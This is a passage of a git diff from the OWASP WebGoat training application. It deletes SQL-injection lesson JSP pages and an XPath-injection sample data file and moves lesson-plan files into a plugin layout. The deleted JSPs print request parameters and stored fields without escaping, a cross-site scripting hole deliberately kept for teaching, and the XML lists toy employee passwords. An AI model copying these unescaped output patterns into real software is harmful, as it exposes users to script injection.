- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-
- <%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- String searchedName = request.getParameter(SQLInjection.SEARCHNAME);
- if (searchedName != null)
- {
- %>
- Employee <%=searchedName%> not found.
- <%
- }
- %>
-
- Name
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/SQLInjection/ViewProfile.jsp b/src/main/webapp/lessons/SQLInjection/ViewProfile.jsp
deleted file mode 100644
index a05a0bc39..000000000
--- a/src/main/webapp/lessons/SQLInjection/ViewProfile.jsp
+++ /dev/null
@@ -1,154 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection"
- errorPage="" %>
-<%
- WebSession webSession = ((WebSession)session.getAttribute("websession"));
- Employee employee = (Employee) session.getAttribute("SQLInjection." + SQLInjection.EMPLOYEE_ATTRIBUTE_KEY);
-// int myUserId = getIntSessionAttribute(webSession, "SQLInjection." + SQLInjection.USER_ID);
-%>
- Welcome Back <%=webSession.getUserNameInLesson()%>
-
-
-
- First Name:
-
-
- <%=employee.getFirstName()%>
-
-
- Last Name:
-
-
- <%=employee.getLastName()%>
-
-
-
- Street:
-
-
- <%=employee.getAddress1()%>
-
-
- City/State:
-
- <%=employee.getAddress2()%>
-
-
-
- Phone:
-
-
- <%=employee.getPhoneNumber()%>
-
-
- Start Date:
-
-
- <%=employee.getStartDate()%>
-
-
-
- SSN:
-
-
- <%=employee.getSsn()%>
-
-
- Salary:
-
-
- <%=employee.getSalary()%>
-
-
-
- Credit Card:
-
-
- <%=employee.getCcn()%>
-
-
- Credit Card Limit:
-
-
- <%=employee.getCcnLimit()%>
-
-
-
- Comments:
-
-
- <%=employee.getPersonalDescription()%>
-
-
- Manager:
-
-
- <%=employee.getManager()%>
-
-
-
- Disciplinary Explanation:
-
-
- <%=employee.getDisciplinaryActionNotes()%>
-
-
- Disciplinary Action Dates:
-
-
- <%=employee.getDisciplinaryActionDate()%>
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lessons/SQLInjection/error.jsp b/src/main/webapp/lessons/SQLInjection/error.jsp
deleted file mode 100644
index 5af0a45dc..000000000
--- a/src/main/webapp/lessons/SQLInjection/error.jsp
+++ /dev/null
@@ -1,3 +0,0 @@
-<%@ page contentType="text/html; charset=ISO-8859-1" language="java"
- errorPage="" %>
- An error has occurred.
diff --git a/src/main/webapp/lessons/SQLInjection/images/lesson1_SearchWindow.jpg b/src/main/webapp/lessons/SQLInjection/images/lesson1_SearchWindow.jpg
deleted file mode 100644
index 39e1ed80d..000000000
Binary files a/src/main/webapp/lessons/SQLInjection/images/lesson1_SearchWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/SQLInjection/images/lesson1_header.jpg b/src/main/webapp/lessons/SQLInjection/images/lesson1_header.jpg
deleted file mode 100644
index 60a809af0..000000000
Binary files a/src/main/webapp/lessons/SQLInjection/images/lesson1_header.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/SQLInjection/images/lesson1_loginWindow.jpg b/src/main/webapp/lessons/SQLInjection/images/lesson1_loginWindow.jpg
deleted file mode 100644
index c91f8a052..000000000
Binary files a/src/main/webapp/lessons/SQLInjection/images/lesson1_loginWindow.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/SQLInjection/images/lesson1_menu.jpg b/src/main/webapp/lessons/SQLInjection/images/lesson1_menu.jpg
deleted file mode 100644
index 2c9512571..000000000
Binary files a/src/main/webapp/lessons/SQLInjection/images/lesson1_menu.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/SQLInjection/images/lesson1_workspace.jpg b/src/main/webapp/lessons/SQLInjection/images/lesson1_workspace.jpg
deleted file mode 100644
index 292d25654..000000000
Binary files a/src/main/webapp/lessons/SQLInjection/images/lesson1_workspace.jpg and /dev/null differ
diff --git a/src/main/webapp/lessons/XPATHInjection/EmployeesData.xml b/src/main/webapp/lessons/XPATHInjection/EmployeesData.xml
deleted file mode 100644
index e82f74989..000000000
--- a/src/main/webapp/lessons/XPATHInjection/EmployeesData.xml
+++ /dev/null
@@ -1,21 +0,0 @@
-
-
-
- Mike
- 11123
- test123
- 468100
-
-
- John
- 63458
- myownpass
- 559833
-
-
- Sarah
- 23363
- secret
- 84000
-
-
diff --git a/src/main/webapp/lesson_plans/en/SqlStringInjection.html b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection.html
similarity index 100%
rename from src/main/webapp/lesson_plans/en/SqlStringInjection.html
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection.html
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/colorschememapping.xml
similarity index 100%
rename from src/main/webapp/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/colorschememapping.xml
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/filelist.xml b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/filelist.xml
similarity index 100%
rename from src/main/webapp/lesson_solutions/SqlStringInjection_files/filelist.xml
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/filelist.xml
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/image001.png b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image001.png
similarity index 100%
rename from src/main/webapp/lesson_solutions/SqlStringInjection_files/image001.png
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image001.png
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/image003.png b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image003.png
similarity index 100%
rename from src/main/webapp/lesson_solutions/SqlStringInjection_files/image003.png
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image003.png
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/image005.jpg b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image005.jpg
similarity index 100%
rename from src/main/webapp/lesson_solutions/SqlStringInjection_files/image005.jpg
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image005.jpg
diff --git a/src/main/webapp/lesson_solutions/SqlStringInjection_files/image006.jpg b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image006.jpg
similarity index 100%
rename from src/main/webapp/lesson_solutions/SqlStringInjection_files/image006.jpg
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/image006.jpg
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/themedata.thmx b/src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/themedata.thmx
similarity index 100%
rename from src/main/webapp/lesson_solutions/AccessControlMatrix_files/themedata.thmx
rename to src/main/webapp/lessons/plugin/SqlStringInjection/en/SqlStringInjection_files/themedata.thmx